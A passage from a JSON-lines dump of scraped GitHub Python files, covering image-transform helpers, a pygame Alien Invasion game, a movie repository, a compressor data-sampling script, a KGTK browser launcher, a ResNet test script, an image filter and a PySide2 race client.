inverse(self):\n        \"\"\"\n        The inverse is to rotate it back with expand, and crop to get the original shape.\n        \"\"\"\n        if not self.expand:  # Not possible to inverse if a part of the image is lost\n            raise NotImplementedError()\n        rotation = RotationTransform(\n            self.bound_h, self.bound_w, -self.angle, True, None, self.interp\n        )\n        crop = CropTransform(\n            (rotation.bound_w - self.w) // 2, (rotation.bound_h - self.h) // 2, self.w, self.h\n        )\n        return TransformList([rotation, crop])\n\n\ndef HFlip_rotated_box(transform, rotated_boxes):\n    \"\"\"\n    Apply the horizontal flip transform on rotated boxes.\n\n    Args:\n        rotated_boxes (ndarray): Nx5 floating point array of\n            (x_center, y_center, width, height, angle_degrees) format\n            in absolute coordinates.\n    \"\"\"\n    # Transform x_center\n    rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]\n    # Transform angle\n    rotated_boxes[:, 4] = -rotated_boxes[:, 4]\n    return rotated_boxes\n\n\ndef Resize_rotated_box(transform, rotated_boxes):\n    \"\"\"\n    Apply the resizing transform on rotated boxes. For details of how these (approximation)\n    formulas are derived, please refer to :meth:`RotatedBoxes.scale`.\n\n    Args:\n        rotated_boxes (ndarray): Nx5 floating point array of\n            (x_center, y_center, width, height, angle_degrees) format\n            in absolute coordinates.\n    \"\"\"\n    scale_factor_x = transform.new_w * 1.0 / transform.w\n    scale_factor_y = transform.new_h * 1.0 / transform.h\n    rotated_boxes[:, 0] *= scale_factor_x\n    rotated_boxes[:, 1] *= scale_factor_y\n    theta = rotated_boxes[:, 4] * np.pi / 180.0\n    c = np.cos(theta)\n    s = np.sin(theta)\n    rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))\n    rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))\n    rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi\n\n    return rotated_boxes\n\n\nHFlipTransform.register_type(\"rotated_box\", HFlip_rotated_box)\nResizeTransform.register_type(\"rotated_box\", Resize_rotated_box)\nNoOpTransform.register_type(\"rotated_box\", lambda t, x: x)\n","repo_name":"dmlc/gluon-cv","sub_path":"gluoncv/torch/data/transforms/instance_transforms/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":38605,"program_lang":"python","lang":"en","doc_type":"code","stars":5662,"dataset":"github-code","pt":"54"}
+{"seq_id":"41870588451","text":"import sys\r\n\r\nfrom time import sleep\r\n\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\n\r\n\r\ndef check_events(score,ai_settings, screen, ship, bullets, stats, play_button,aliens):\r\n    '''Respond to keypresses and mouse events'''\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            sys.exit()\r\n        elif event.type == pygame.KEYDOWN:\r\n            check_keydown_events(event, ai_settings, screen, ship, bullets, aliens, stats,score)\r\n        elif event.type == pygame.KEYUP:\r\n            check_keyup_events(event,ship)\r\n        elif event.type == pygame.MOUSEBUTTONDOWN:\r\n            mouse_x, mouse_y = pygame.mouse.get_pos()\r\n            check_play_button(score,stats, play_button, mouse_x, mouse_y,\r\n                              ai_settings,screen,aliens, ship,bullets)\r\n\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets, aliens, stats,score):\r\n    '''Respond to keypresses'''\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = 1\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = 1\r\n    elif event.key == pygame.K_SPACE:\r\n        fire_bullet(ai_settings, screen, ship, bullets)\r\n    elif event.key == pygame.K_ESCAPE :\r\n        sys.exit()\r\n    elif event.key == pygame.K_p: # start the game; setup code copied from check_play_button\r\n        start_game(stats,ai_settings,screen, aliens, ship,bullets)\r\n        # reset the game settings\r\n        ai_settings.initialize_dynamic_settings()\r\n        stats.reset_stats()\r\n\r\n        # refresh the scoreboard images: high score, level, current score, ships left\r\n        score.prep_high_score()\r\n        score.prep_level()\r\n        score.prep_score()\r\n        score.prep_ships()\r\n\r\ndef check_keyup_events(event,ship):\r\n    '''Respond to key releases'''\r\n    if event.key == pygame.K_RIGHT:\r\n        ship.moving_right = 0\r\n    elif event.key == pygame.K_LEFT:\r\n        ship.moving_left = 0\r\n\r\ndef check_play_button(score,stats, play_button, mouse_x, mouse_y,\r\n                      ai_settings,screen, aliens, ship,bullets):\r\n    '''Start a new game when the player clicks Play'''\r\n    if play_button.rect.collidepoint(mouse_x, mouse_y) and not stats.game_active :\r\n        start_game(stats,ai_settings,screen, aliens, ship,bullets)\r\n        # reset the game settings\r\n        ai_settings.initialize_dynamic_settings()\r\n        stats.reset_stats()\r\n\r\n        # refresh the scoreboard images: high score, level, current score, ships left\r\n        score.prep_high_score()\r\n        score.prep_level()\r\n        score.prep_score()\r\n        score.prep_ships()\r\n\r\ndef start_game(stats,ai_settings,screen, aliens, ship,bullets):\r\n    pygame.mouse.set_visible(0)\r\n    stats.game_active = 1\r\n    bullets.empty()\r\n    aliens.empty()\r\n    # recreate the alien fleet and re-center the ship\r\n    creat_fleet(ai_settings, screen, aliens, ship)\r\n    ship.center_ship()\r\n    # Pause\r\n    sleep(0.5)\r\n    stats.reset_stats()\r\n\r\ndef screen_update(ai_settings, screen, ship, aliens, bullets, stats, play_button, score):\r\n    '''Redraw everything on screen and flip to the new screen'''\r\n    # redraw the screen on each pass through the loop\r\n    screen.fill(ai_settings.bg_color)\r\n\r\n    if stats.game_active:\r\n        for bullet in bullets.sprites():\r\n            bullet.draw_bullet()\r\n\r\n        ship.blitme()\r\n        aliens.draw(screen)\r\n        score.show_score()\r\n\r\n    if not stats.game_active:\r\n        play_button.draw_button()\r\n\r\n    # make the most recently drawn screen visible\r\n    pygame.display.flip()\r\n\r\ndef bullets_update(bullets,aliens,ai_settings, screen, ship, stats, score):\r\n    '''Update bullet positions and get rid of bullets that have disappeared'''\r\n    # update bullet positions\r\n    bullets.update()\r\n    # get rid of bullets that have left the screen\r\n    for bullet in bullets.copy():\r\n        if bullet.rect.bottom <= 0:\r\n            bullets.remove(bullet)\r\n    check_collisions(ai_settings, screen, aliens, bullets, ship, stats, score)\r\n\r\ndef check_collisions(ai_settings, screen, aliens, bullets, ship, stats, score):\r\n    '''Respond to bullet-alien collisions'''\r\n    # check whether any bullet has hit an alien;\r\n    # if so, remove both the bullet and the alien\r\n    collisions = pygame.sprite.groupcollide(bullets, aliens, 1, 1)\r\n    if collisions :\r\n        # score correctly even when one bullet hits several aliens\r\n        for hit_aliens in collisions.values():\r\n            stats.score += ai_settings.alien_points * len(hit_aliens)\r\n            score.prep_score()\r\n        check_high_score(stats, score)\r\n    # if the alien group is empty, rebuild the fleet\r\n    if len(aliens) == 0:\r\n        bullets.empty()\r\n        # raise the level once the whole fleet is destroyed\r\n        stats.level += 1\r\n        score.prep_level()\r\n\r\n        creat_fleet(ai_settings, screen, aliens, ship)\r\n        ai_settings.increase_speed()\r\n\r\n\r\ndef fire_bullet(ai_settings, screen, ship, bullets):\r\n    # create a new bullet and add it to the group if the bullet limit is not reached yet\r\n    if len(bullets) < ai_settings.bullets_allowed:\r\n        new_bullet = Bullet(ai_settings, screen, ship)\r\n        bullets.add(new_bullet)\r\n\r\n\r\ndef create_alien(ai_settings,screen,aliens,alien_number, row_number):\r\n    alien = Alien(ai_settings, screen)\r\n    alien_width = alien.rect.width\r\n    alien.x = alien_width + 2 * alien_width * alien_number\r\n    alien.rect.x = alien.x\r\n    alien.rect.y = alien.rect.height + 2*alien.rect.height*row_number\r\n    aliens.add(alien)\r\n\r\ndef creat_fleet(ai_settings, screen, aliens, ship):\r\n    '''Create a full fleet of aliens'''\r\n    alien = Alien(ai_settings, screen)\r\n    number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\r\n    number_rows = get_number_rows(ai_settings, ship.rect.height,\r\n                                  alien.rect.height, )\r\n    # Create the rows of aliens\r\n    for row_number in range(number_rows):\r\n        for alien_number in range(number_aliens_x):\r\n            # Create a new alien and place it in the row\r\n            create_alien(ai_settings,screen,aliens,alien_number,row_number)\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n    '''Compute how many aliens fit in one row'''\r\n    # the horizontal spacing between aliens equals one alien width\r\n    avaliable_space_x = ai_settings.screen_width - 2 * alien_width\r\n    number_aliens_x = int(avaliable_space_x / alien_width / 2)\r\n    return number_aliens_x\r\n\r\ndef get_number_rows(ai_settings, ship_height, alien_height, ):\r\n    '''Compute how many rows of aliens fit on the screen'''\r\n    # the vertical spacing between rows equals one alien height\r\n    avaliable_space_y = ai_settings.screen_height - 3 * alien_height - ship_height\r\n    number_rows = int(avaliable_space_y / alien_height / 2)\r\n    return number_rows\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n    \"\"\"Respond appropriately if any aliens have reached an edge\"\"\"\r\n    for alien in aliens.sprites():\r\n        if alien.check_edges():\r\n            change_fleet_direction(ai_settings, aliens)\r\n            break\r\n\r\ndef change_fleet_direction(ai_settings, aliens):\r\n    \"\"\"Drop the entire fleet and change its direction\"\"\"\r\n    for alien in aliens.sprites():\r\n        alien.rect.y += ai_settings.fleet_drop_speed\r\n    ai_settings.fleet_direction *= -1\r\n\r\ndef check_aliens_bottom( ai_settings,aliens, ship, screen,stats,bullets,score):\r\n    '''Check whether any aliens have reached the bottom of the screen'''\r\n    for alien in aliens.sprites():\r\n        screen_rect = screen.get_rect()\r\n        if alien.rect.bottom >= screen_rect.bottom:\r\n            # treat this the same as the ship being hit\r\n            ship_hit(ai_settings,aliens, ship, screen,stats,bullets,score)\r\n            break\r\n\r\ndef aliens_update(ai_settings,aliens, ship, screen,stats,bullets,score):\r\n    \"\"\"\r\n    Check whether the fleet is at an edge, then update the positions of all aliens\r\n    \"\"\"\r\n    # update the aliens\r\n    check_fleet_edges(ai_settings, aliens,)\r\n    aliens.update()\r\n    # detect collisions between aliens and the ship\r\n    if pygame.sprite.spritecollideany(ship,aliens):\r\n        ship_hit(ai_settings,aliens, ship, screen,stats,bullets, score)\r\n    # check whether any aliens have reached the bottom of the screen\r\n    check_aliens_bottom(ai_settings,aliens, ship, screen,stats,bullets,score)\r\n\r\ndef ship_hit(ai_settings,aliens, ship, screen,stats,bullets, score):\r\n    '''Respond to the ship being hit by an alien'''\r\n\r\n    # decrement the number of ships left\r\n    if stats.ship_left > 1:\r\n        stats.ship_left -= 1\r\n        score.prep_ships()\r\n        # empty the groups of bullets and aliens\r\n        bullets.empty()\r\n        aliens.empty()\r\n        # recreate the alien fleet and re-center the ship\r\n        creat_fleet(ai_settings, screen, aliens, ship)\r\n        ship.center_ship()\r\n        # Pause\r\n        sleep(0.5)\r\n    else:\r\n        stats.game_active = 0\r\n        pygame.mouse.set_visible(1)\r\n\r\ndef check_high_score(stats, score):\r\n    '''Check for a new high score'''\r\n    with open('high_score.txt','r+') as f:\r\n        if stats.score > stats.high_score:\r\n            stats.high_score = stats.score\r\n            f.write(str(stats.high_score))\r\n            score.prep_high_score()\r\n","repo_name":"prmsvion/alien_invasions","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"25986582241","text":"import movie\nimport json\n\n\nclass MovieRepository:\n    def __init__(self):\n        with open('movies.json', 'r') as f:\n            self.movies = json.JSONDecoder(object_hook=movie.from_json).decode(f.read())\n\n    def get_all(self):\n        return self.movies\n\n    def get(self, movie_id):\n        return list(filter(lambda x: x.id == movie_id, self.movies))\n\n    def add(self, movie_object):\n        if isinstance(movie_object, list):\n            last_id = max(self.movies).id + 1\n            for _movie in movie_object:\n                _movie.id = last_id\n                self.movies.append(movie.Movie(_movie.id, _movie.title, _movie.year, _movie.actors, _movie.director))\n                last_id += 1\n        
else:\n movie_object.id = max(self.movies).id + 1\n self.movies.append(movie.Movie(movie_object.id, movie_object.title, movie_object.year, movie_object.actors,\n movie_object.director))\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n return movie_object\n\n def remove(self, movie_id):\n self.movies = list(filter(lambda x: x.id != movie_id, self.movies))\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n def remove_all(self):\n self.movies = []\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n def replace(self, movie_id, movie_object):\n found_movie = next((_movie for _movie in self.movies if _movie.id == movie_id), None)\n\n if found_movie:\n movie_object.id = movie_id\n self.movies.remove(found_movie)\n self.movies.append(movie_object)\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n else:\n self.add(movie_object)\n\n def replace_all(self, new_movies):\n self.movies = new_movies\n\n for i in range(1, len(self.movies) + 1):\n self.movies[i - 1].id = i\n\n with open('movies.json', 'w') as f:\n json.dump(self.movies, f, cls=movie.MovieEncoder)\n\n return self.movies\n\n\nif __name__ == '__main__':\n repo = MovieRepository()\n print(repo.get(2))\n","repo_name":"eduard-tuduri/Cloud-Computing","sub_path":"Homeworks/Homework 2/movie_repository.py","file_name":"movie_repository.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74226683682","text":"import os\nimport pathlib\n\nimport click\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.dataset as ds\nimport pyarrow.parquet as pq\n\nfrom radcompressor import thermo\n\n\nparameters = {\"T_range\": [170, 400], \"Pr\": [1, 100]} # K\n\nparameters_narrow = {\"m_in\": [0.15, 0.25], \"mach_tip\": [0.35, 0.7]}\n\nparameters_wide = {\"m_in\": [5e-2, 0.7], \"mach_tip\": [5e-2, 2.5]}\n\n\n@click.command()\n@click.option(\"--geometries\", \"-g\", type=click.Path(exists=True, dir_okay=False))\n@click.option(\n \"--output\",\n type=click.Path(file_okay=False),\n default=\"data\",\n help=\"Folder where dataset subfolders will be created\",\n)\n@click.option(\"--output-row-size\", default=5000)\n@click.option(\"--fluid\", \"-f\", \"fluid_list\", type=str, required=True, multiple=True)\n@click.option(\n \"--fluid-type\", type=click.Choice([\"coolprop\", \"refprop\"]), default=\"coolprop\"\n)\n@click.option(\"--batch-size\", \"-b\", default=20000)\n@click.option(\n \"--n-points\", \"-no\", default=10, help=\"Number of operating points (Mf, Nrot)\"\n)\n@click.option(\n \"--n-inlet\", \"-ni\", default=10, help=\"Number of inlet conditions (Pin, Tin)\"\n)\n@click.option(\"--narrow/--wide\", default=False)\ndef main(\n geometries,\n output,\n output_row_size,\n fluid_list,\n fluid_type,\n batch_size,\n n_points,\n n_inlet,\n narrow,\n):\n \"\"\"Sample conditions for the provided geometries\"\"\"\n # Set bounds\n if narrow:\n parameters.update(parameters_narrow)\n else:\n parameters.update(parameters_wide)\n # Prepare fluid and load to check if it exists\n if fluid_type == \"coolprop\":\n fld = {f: thermo.CoolPropFluid(f) for f in fluid_list}\n elif fluid_type == \"refprop\":\n fld = {f: thermo.RefpropFluid(f) for f in fluid_list}\n\n # Prepare rng\n rng = np.random.default_rng()\n\n geometries = pathlib.Path(geometries)\n output_subfolder = 
pathlib.Path(output) / (\n os.path.splitext(geometries.parts[-1])[0] + \"_tabular\"\n )\n output_subfolder.mkdir(exist_ok=True)\n\n geom_ds = ds.dataset(geometries)\n\n idx_offset = 0\n\n for b in geom_ds.to_batches(batch_size=batch_size, columns=[\"geom_id\"]):\n geom_idx = b.to_pandas().index\n n_geom = len(geom_idx)\n\n fluids = rng.choice(fluid_list, size=n_geom * n_inlet, replace=True)\n T_triple, T_max, T_crit, P_crit = np.array(\n [\n [fld[f].T_triple, fld[f].T_max, fld[f].T_crit, fld[f].P_crit]\n for f in fluids\n ]\n ).T\n T_low = np.maximum(T_triple + 30, parameters[\"T_range\"][0])\n T_high = np.minimum(T_max - 50, parameters[\"T_range\"][1])\n\n Teff = rng.uniform(low=T_low, high=T_high, size=n_geom * n_inlet)\n\n Pmax = P_crit * (Teff > T_crit)\n Pmax[Pmax == 0] = [\n fld[f].thermo_prop(\"TQ\", t, 1).P - 1.1e-4\n for t, f in zip(Teff[Pmax == 0], fluids[Pmax == 0])\n ]\n # 1.1e-4 added to avoid Coolprop issues\n\n Pmax[Pmax > P_crit / 3] = P_crit[Pmax > P_crit / 3] / 3\n\n Peff_r = parameters[\"Pr\"][0] + (1 - rng.power(5, len(Teff))) * (\n parameters[\"Pr\"][1] - parameters[\"Pr\"][0]\n )\n Peff = Pmax / Peff_r\n\n # Validate that each condition is valid\n [\n fld[f].thermo_prop(\"PT\", p, t).P - 1.1e-4\n for t, f, p in zip(Teff, fluids, Peff)\n ]\n\n m_in = rng.uniform(\n low=parameters[\"m_in\"][0],\n high=parameters[\"m_in\"][1],\n size=n_geom * n_inlet * n_points,\n )\n mach_tip = rng.uniform(\n low=parameters[\"mach_tip\"][0],\n high=parameters[\"mach_tip\"][1],\n size=n_geom * n_inlet * n_points,\n )\n\n df = pd.DataFrame(\n {\n \"geom_id\": geom_idx.repeat(n_inlet * n_points),\n \"fluid\": fluids.repeat(n_points),\n \"in_T\": Teff.repeat(n_points),\n \"in_P\": Peff.repeat(n_points),\n \"in_m_in0\": m_in,\n \"in_mach_tip\": mach_tip,\n }\n )\n df.index.name = \"cond_id\"\n\n df.index += idx_offset\n idx_offset = df.index.max() + 1\n\n table = pa.Table.from_pandas(df, preserve_index=True)\n table_name = (\n output_subfolder / f\"data_{geom_idx.min()}-{geom_idx.max()}.parquet\"\n )\n pq.write_table(table, table_name, row_group_size=output_row_size)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cyrilpic/radcomp","sub_path":"scripts/sample_conditions.py","file_name":"sample_conditions.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"30681060075","text":"\"\"\"\nRun the KGTK-Browser Flask server\nOpen a browser window with the kgtk-browser location\n\nOptional params:\n - hostname (--host)\n - port number (-p, --port)\n - kgtk browser config file (-c, --config)\n - kgtk browser flask app file (-a, --app)\n\nExample usage:\n kgtk browser --host 0.0.0.0 --port 1234 --app flask_app.py --config config.py\n\"\"\"\n\nfrom argparse import Namespace, SUPPRESS\n\nfrom kgtk.cli_argparse import KGTKArgumentParser, KGTKFiles\n\n# Define the name of the command and its alias.\nBROWSER_COMMAND: str = \"browser\"\nBROWSE_COMMAND: str = \"browse\"\n\n\ndef parser():\n return {\n 'aliases': [BROWSE_COMMAND],\n 'help': 'Run the KGTK-Browser Flask app.',\n 'description': 'Open a new browser with the KGTK-Browser app running.',\n }\n\n\ndef add_arguments_extended(parser: KGTKArgumentParser, parsed_shared_args: Namespace):\n \"\"\"\n Parse arguments\n Args:\n parser (argparse.ArgumentParser)\n \"\"\"\n from kgtk.utils.argparsehelpers import optional_bool\n\n # These special shared aruments inticate whether the `--expert` option\n # was supplied and the command name that was 
used.\n _expert: bool = parsed_shared_args._expert\n _command: str = parsed_shared_args._command\n\n # This helper function makes it easy to suppress options from\n # The help message. The options are still there, and initialize\n # what they need to initialize.\n def h(msg: str) -> str:\n if _expert:\n return msg\n else:\n return SUPPRESS\n\n # KGTK Browser hostname\n parser.add_argument(\n '--host',\n dest=\"kgtk_browser_host\",\n help=\"Hostname used to launch flask server, defaults to localhost\",\n default=\"localhost\",\n )\n\n # KGTK Browser port number\n parser.add_argument(\n '-p', '--port',\n dest=\"kgtk_browser_port\",\n help=\"Port number used to launch flask server, defaults to 5000\",\n default=\"5000\",\n )\n\n # KGTK Browser configuration file\n parser.add_argument(\n '-c', '--config',\n dest=\"kgtk_browser_config\",\n help=\"KGTK Browser configuration file, defaults to `kgtk_browser_config.py`\",\n default=\"kgtk_browser_config.py\",\n )\n\n # KGTK Browser application file\n parser.add_argument(\n '-a', '--app',\n dest=\"kgtk_browser_app\",\n help=\"KGTK Browser flask application file, defaults to `kgtk_browser_app.py`\",\n default=\"kgtk_browser_app.py\",\n )\n\n\ndef run(\n kgtk_browser_host: str = '0.0.0.0',\n kgtk_browser_port: str = '5000',\n kgtk_browser_config: str = 'kgtk_browser_config.py',\n kgtk_browser_app: str = 'kgtk_browser_app.py',\n\n errors_to_stdout: bool = False,\n errors_to_stderr: bool = True,\n show_options: bool = False,\n verbose: bool = False,\n very_verbose: bool = False,\n\n **kwargs # Whatever KgtkFileOptions and KgtkValueOptions want.\n) -> int:\n # import modules locally\n from pathlib import Path\n import simplejson as json\n import webbrowser\n import threading\n import os, sys\n import typing\n\n from kgtk.exceptions import KGTKException\n\n # Select where to send error messages, defaulting to stderr.\n error_file: typing.TextIO = sys.stdout if errors_to_stdout else sys.stderr\n\n try:\n\n # Set the flask app and configuration file settings\n os.environ[\"FLASK_APP\"] = kgtk_browser_app\n os.environ[\"KGTK_BROWSER_CONFIG\"] = kgtk_browser_config\n\n # Open the default web browser at the kgtk-browser location\n url = \"http://{}:{}/browser\".format(kgtk_browser_host, kgtk_browser_port)\n threading.Timer(2.5, lambda: webbrowser.open(url)).start()\n\n # Run flask app using the selected host and port\n os.system(\n \"flask run --host {} --port {}\".format(\n kgtk_browser_host,\n kgtk_browser_port,\n )\n )\n\n return 0\n\n except SystemExit as e:\n raise KGTKException(\"Exit requested\")\n except Exception as e:\n raise KGTKException(str(e))\n","repo_name":"usc-isi-i2/kgtk-browser","sub_path":"kgtk_extensions/cli/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"26109935006","text":"# coding: utf-8\r\nimport os\r\nimport time\r\nimport torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nfrom _segclsDataReader import SCdataset\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom _utils import *\r\n\r\n\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\ntorch.manual_seed(3)\r\nnp.random.seed(3)\r\ntorch.cuda.manual_seed(3)\r\n\r\n#%% #######################hyparameter\r\nnormMean = [0.787, 0.5723, 0.769]\r\nnormStd = [0.1193, 0.1878, 0.0974]\r\ntestpath = '../data/test.txt'\r\nbatch_size = 150\r\nnum_worker = 
8\r\n\r\nnum_class = 2\r\n\r\n\r\ndef deTransform(mean, std, tensor):\r\n    mean = torch.as_tensor(mean, dtype=torch.float32, device=tensor.device)\r\n    std = torch.as_tensor(std, dtype=torch.float32, device=tensor.device)\r\n    tensor.mul_(std[:, None, None]).add_(mean[:, None, None])\r\n    return tensor\r\n\r\nstart = time.time()\r\n####################### transformer definition, dataset reader and loader\r\npreprocess = transforms.Compose([\r\n    # transforms.RandomChoice([transforms.RandomHorizontalFlip(p=1),\r\n    #                          transforms.RandomVerticalFlip(p=1)]), # randomly select one for process\r\n    transforms.ToTensor(), # preprocess operates on the original image and would override the transforms commented out above.\r\n    transforms.Normalize(normMean, normStd)])\r\n\r\ntestset = SCdataset(testpath, preprocess)\r\ntestloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_worker)\r\n\r\nnet = models.resnet34(pretrained=False, num_classes=num_class).cuda() # num_class is 2 (binary classification)\r\nnet.load_state_dict(torch.load('../model/epoch_45.pkl')) # load the fine-tuned weights\r\n\r\ncorrect = 0\r\npredictions = np.array([])\r\nreal = np.array([])\r\nscore = np.array([])\r\nnet.eval()\r\nwith torch.no_grad():\r\n    for i, (img, target) in tqdm(enumerate(testloader)):\r\n        target = target.cuda().long()\r\n        prob = F.softmax(net(img.cuda()), 1, _stacklevel=5)\r\n        prediction = torch.argmax(prob, dim=1)\r\n        correct += (prediction == target).sum().item()\r\n\r\n        predictions = np.concatenate((predictions, prediction.cpu().numpy()), axis=0)\r\n        real = np.concatenate((real, target.cpu().numpy()), axis=0)\r\n        score = np.concatenate((score, np.array(prob[:, 1].cpu())), axis=0)\r\n\r\nAcc = correct * 1.0 / testset.__len__()\r\nprint('---ACC{:.4f}---epoch{:.4f}---epoch{:.4f}---'.format(Acc, 1, 1))\r\n\r\nShowConfusionMatrix(real, predictions)\r\nROCAUC(real, score)\r\nprint(time.time()-start)\r\n##\r\n# nn.ModuleList\r\n# nn.ReLU\r\n","repo_name":"gatsby2016/DLforWSI","sub_path":"codes/5_test.py","file_name":"5_test.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"}
+{"seq_id":"23829425511","text":"# filter.py\n# https://stackoverflow.com/questions/9701515/filter-part-of-image-using-pil-python\n\n# IMPORTS\nimport sys, imghdr, colorsys\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps, ImageFilter\n\n# SIMPLIFYING SYS.ARGV\ndef commandCall(argNum):\n    return sys.argv[int(argNum)]\n\nbaseImg = Image.open(commandCall(1))\nbaseStr = commandCall(1)\nacceptList = [\"png\",\"jpeg\",\"jpg\"]\n\nif not ( (imghdr.what(baseStr)) in acceptList):\n    print(\"Invalid image format.\")\n    quit()\nelse:\n    print(\"Acceptable image format. 
Continuing...\")\n\nbaseImg.save('basePNG.png','PNG')\nbasePNG = Image.open('basePNG.png')\n\n# basePNG.show()\n\nmodifyA = basePNG.filter(ImageFilter.MedianFilter(5))\n# modifyA.show()\n\nwidth, height = basePNG.size\n\n\"\"\"\nbaseForCrop = Image.open('basePNG.png')\nbox = (0,0,int(width*(2/3)),int(height*(2/3)))\nBcrop1 = basePNG.crop(box)\nBcropEd = Bcrop1.filter(ImageFilter.MedianFilter(15))\nbaseForCrop.paste(BcropEd, box)\nmodifyB = baseForCrop\n# modifyB.show()\n\"\"\"\n\nbaseHSV = basePNG.convert('HSV')\n# baseHSV.show()\n\n\n\nmodifyC = baseHSV\nmodifyD = modifyC\n\nbaseLoaded = basePNG.load()\n\n\"\"\"\nfor y in range(basePNG.size[1]):\n for x in range(basePNG.size[0]):\n color = tuple(baseLoaded[x, y])\n h, s, v = colorsys.rgb_to_hsv(color[0],color[1],color[2])\n h = h\n s = s * 0.8\n v = v * 0.9\n r, g, b = colorsys.hsv_to_rgb(h,s,v)\n modifyD.putpixel( (x,y), (int(r+200),int(g),int(b+200)) )\n\nmodifyD = modifyD.filter(ImageFilter.SMOOTH)\nmodifyD.show()\n\"\"\"\n\n\nfor y in range(basePNG.size[1]):\n for x in range(basePNG.size[0]):\n color = tuple(baseLoaded[x, y])\n h, s, v = colorsys.rgb_to_hsv(color[0],color[1],color[2])\n h = h\n s = s * 0.8\n v = v * 0.9\n r, g, b = colorsys.hsv_to_rgb(h,s,v)\n modifyC.putpixel( (x,y), (int(r),int(abs(g-10)),int(b)) )\n\nmodifyC = modifyC.filter(ImageFilter.SMOOTH)\nmodifyC = modifyC.convert('RGB')\nmodifyC.save('finalFiltered.png','PNG')\nmodifyC.show()\n\n\n","repo_name":"theKyrgyz/SublimeTextCS550","sub_path":"ImageFilter/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42628210879","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport os\nimport socket\nimport threading\nimport time\nimport censusname # `sudo pip install censusname`\n\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtQml import QQmlApplicationEngine\nfrom PySide2.QtCore import QObject, Signal\n\nHOST = '127.0.0.1' # The server's hostname or IP address\nPORT = 2468 # The default port used by the server\n\n\nclass Receiver(QObject):\n\n msg_number = 0\n raceData = Signal(str, float, int, int, arguments=['name', 'elapsed', 'id', 'gate'])\n\n def handle_race_data(self):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n\n except socket.error as e:\n print(\"Failed to create socket: \" + str(e))\n sys.exit(-1)\n\n # keep trying every 5 seconds to connect to server until server is running\n while True:\n try:\n s.connect((HOST, PORT))\n print(\"Socket connected to server \" + HOST + \" port: \" + str(PORT))\n s.sendall(b'start')\n break\n\n except socket.error as e:\n print(\"Failed to connect to server: \" + str(e) + \" - make sure it's running.\")\n time.sleep(5)\n\n while True:\n self.msg_number += 1\n s.sendall(bytes(str(self.msg_number), 'utf-8')) # you need to send at least 1 byte to get next message\n data = s.recv(1024)\n if (data == b'None'):\n print('......No more data is coming. 
Exiting.')\n exit(0)\n data = data.decode('utf-8').translate({ord(i): None for i in ' ()'}).split(',')\n self.raceData.emit(censusname.generate(), float(data[0]), int(data[1]), int(data[2]))\n\ndef run():\n app = QGuiApplication(sys.argv)\n engine = QQmlApplicationEngine()\n\n myReceiver = Receiver()\n engine.rootContext().setContextProperty(\"Receiver\", myReceiver)\n engine.load(os.path.join(os.path.dirname(__file__), \"ImprobableRaceClient.qml\"))\n\n listeningThread = threading.Thread(target=myReceiver.handle_race_data, daemon=True)\n listeningThread.start()\n if not engine.rootObjects():\n sys.exit(-1)\n\n return app.exec_()\n\nif __name__ == \"__main__\":\n sys.exit(run())\n","repo_name":"pmoerschell/sharedQML","sub_path":"race/ImprobableRaceClient.py","file_name":"ImprobableRaceClient.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31137512665","text":"import motor.motor_asyncio\nfrom redis import asyncio as aioredis\nimport redis\nimport os\nimport re\nfrom dotenv import load_dotenv\nimport coc\nfrom pytz import utc\nfrom datetime import datetime, timedelta\nfrom expiring_dict import ExpiringDict\nimport io\nimport asyncio\nimport aiohttp\nfrom fastapi import HTTPException\nimport ujson\nfrom base64 import b64decode as 